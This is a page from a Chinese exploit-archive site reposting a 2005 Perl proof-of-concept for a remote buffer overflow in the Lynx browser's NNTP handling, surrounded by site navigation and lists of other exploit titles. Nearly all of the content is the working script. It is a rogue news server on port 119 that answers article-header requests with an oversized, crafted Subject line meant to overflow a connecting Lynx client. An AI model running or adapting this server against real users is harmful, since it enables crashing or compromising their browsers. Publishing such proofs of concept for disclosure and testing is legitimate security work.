首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Lynx Browser NNTP Handling Remote Buffer Overflow PoC Exploit
来源:vfocus.net 作者:Ulf 发布时间:2005-10-17  

Lynx Browser NNTP Handling Remote Buffer Overflow PoC Exploit


#!/usr/bin/perl --

# lynx-nntp-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

use strict;
use IO::Socket;

$main::port = 119;
$main::timeout = 5;

# *** SUBROUTINES ***

sub mysend($$)
{
my $file = shift;
my $str = shift;

print $file "$str\n";
print "SENT: $str\n";
} # sub mysend

sub myreceive($)
{
my $file = shift;
my $inp;

eval
{
local $SIG{ALRM} = sub { die "alarm\n" };
alarm $main::timeout;
$inp = <$file>;
alarm 0;
};

if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
$inp =~ tr/\015\012\000//d;
print "RECEIVED: $inp\n";
$inp;
} # sub myreceive

# *** MAIN PROGRAM ***

{
my $server = IO::Socket::INET->new( Proto => 'tcp',
LocalPort => $main::port,
Listen => SOMAXCONN,
Reuse => 1);
die "can't set up server!\n" unless $server;


while (my $client = $server->accept())
{
$client->autoflush(1);
print 'connection from '.$client->peerhost."\n";


mysend($client, '200 Internet News');
my $group = 'alt.angst';

while (my $str = myreceive($client))
{
if ($str =~ m/^mode reader$/i)
{
mysend($client, '200 Internet News');
next;
}

if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i)
{
$group = $1;
mysend($client, "211 1 1 1 $group");
next;
}

if ($str =~ m/^quit$/i)
{
mysend($client, '205 Goodbye');
last;
}

if ($str =~ m/^head ([0-9]+)$/i)
{
my $evil = '$@UU(JUU' x 21; # Edit the number!
$evil .= 'U' x (504 - length $evil);

my $head = <<HERE;
221 $1 <xyzzy\@usenet.qx>
Path: host!someotherhost!onemorehost
From: <mr_talkative\@usenet.qx>
Subject: $evil
Newsgroup: $group
Message-ID: <xyzzy\@usenet.qx>
.
HERE

$head =~ s|\s+$||s;
mysend($client, $head);
next;
}

mysend($client, '500 Syntax Error');
} # while str=myreceive(client)

close $client;
print "closed\n\n\n";
} # while client=server->accept()
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Collaboration Data O
·TYPSoft FTP Server RETR DoS
·Microsoft Windows Network Conn
·HP-UX FTP Server Pre-authentic
·Microsoft Windows FTP Client F
·Computer Associates Unicenter
·MailEnable Logging Buffer Over
·HP-UX LPD Service Buffer Overf
·Computer Associates iGateway d
·MailEnable Pro 1.x STATUS Comm
·xine-lib CDDB Client Metadata
·RSA SecurID Web Agent IISWebAg
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved